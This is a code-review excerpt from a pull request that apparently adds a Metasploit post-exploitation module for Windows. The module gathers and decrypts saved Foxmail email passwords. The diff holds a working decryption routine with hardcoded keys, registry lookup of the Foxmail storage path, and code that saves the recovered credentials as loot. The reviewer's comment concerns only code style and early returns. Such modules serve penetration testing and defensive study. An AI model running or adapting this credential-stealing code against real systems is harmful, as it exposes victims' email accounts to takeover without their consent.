modules/post/windows/gather/credentials/foxmail.rb

```diff
@@ -0,0 +1,210 @@
+        index += 1
+      end
+      email_info['Password'] = foxmail_crypto(version, email_info['Password']) if email_info['Password']
+      tbl << {
+        email: email_info['Email'],
+        server: email_info['IncomingServer'],
+        port: email_info['IncomingPort'],
+        ssl: email_info['InComingSSL'],
+        password: email_info['Password']
+      }
+      tbl << {
+        email: email_info['Email'],
+        server: email_info['OutgoingServer'],
+        port: email_info['OutgoingPort'],
+        ssl: email_info['OutgoingSSL'],
+        password: email_info['Password']
+      }
+    end
+    return tbl
+  end
+
+  def foxmail_crypto(version, ciphertext)
+    miag_crypt = '~draGon~'
+    v7_miag_crypt = '~F@7%m$~'
+    fc0 = '5A'.to_i(16)
+    if version == 1
+      miag_crypt = v7_miag_crypt.unpack('c*')
+      fc0 = '71'.to_i(16)
+    end
+    size = ciphertext.length / 2
+    index = 0
+    b = []
+    (0..size).step(1) do |i|
+      b[i] = ciphertext[index, 2].to_i(16)
+      index += 2
+    end
+    b = b[0..-2]
+    cc = []
+    cc[0] = b[0] ^ fc0
+    cc[1..-1] = b[1..-1]
+    while miag_crypt.length < b.length
+      new_miag_crypt = miag_crypt * 2
+      miag_crypt = new_miag_crypt
+    end
+    d = []
+    (1..b.length).each do |i|
+      d[i - 1] = b[i] ^ miag_crypt[i - 1]
+    end
+    d[-1] = 0
+    e = []
+    (0..d.length - 1).each do |i|
+      if (d[i] - cc[i] < 0)
+        e[i] = d[i] + 255 - cc[i]
+      else
+        e[i] = d[i] - cc[i]
+      end
+    end
+    e = e[0..-2]
+    return e.pack('C*')
+  end
+
+  def run
+    print_status("Gathering Foxmail passwords on #{sysinfo['Computer']}")
+    # get session file path
+    foxmail_path = ''
+    if datastore['ACCOUNT_PATH'].to_s.empty?
+      parent_key = 'HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview'
+      root_path = registry_getvaldata(parent_key, 'Executable')
+      foxmail_path = "#{root_path[0, root_path.rindex('\\') + 1]}Storage" if !root_path.to_s.empty?
+    else
+      foxmail_path = expand_path(datastore['ACCOUNT_PATH'])
+    end
+    if directory?(foxmail_path)
+      result = enum_session_file(foxmail_path)
+      if !result.nil?
+        columns = [
+          'Email',
+          'Server',
+          'Port',
+          'SSL',
+          'Password or Token'
+        ]
+        tbl = Rex::Text::Table.new(
+          'Header' => 'Foxmail Password',
+          'Columns' => columns
+        )
+        result.each do |item|
+          tbl << item.values
+        end
+        if !tbl.rows.empty?
+          print_line(tbl.to_s)
+          path = store_loot('host.foxmail_password', 'text/plain', session, tbl.to_s, 'foxmail_password.txt', 'foxmail Passwords')
+          print_good("Passwords stored in: #{path}")
+        else
+          print_status('Nothing was found')
+        end
+      end
+    else
+      print_error('Could not find the registry entry for the Foxmail account path. Ensure that Foxmail is installed on the target.')
+    end
```

Comment:
Most of this method exists within two conditional statements. These would be cleaner as guards to return early.

Also, nothing is printed for the `result.nil?` code path. Some feedback would be nice and would be consistent with the other code paths.

```suggestion
    unless directory?(foxmail_path)
      print_error('Could not find the registry entry for the Foxmail account path. Ensure that Foxmail is installed on the target.')
      return
    end

    result = enum_session_file(foxmail_path)

    if result.nil?
      print_status('Nothing was found')
      return
    end

    columns = [
      'Email',
      'Server',
      'Port',
      'SSL',
      'Password or Token'
    ]
    tbl = Rex::Text::Table.new(
      'Header' => 'Foxmail Password',
      'Columns' => columns
    )
    result.each do |item|
      tbl << item.values
    end

    if tbl.rows.empty?
      print_status('Nothing was found')
      return
    end

    print_line(tbl.to_s)
    path = store_loot('host.foxmail_password', 'text/plain', session, tbl.to_s, 'foxmail_password.txt', 'foxmail Passwords')
    print_good("Passwords stored in: #{path}")
```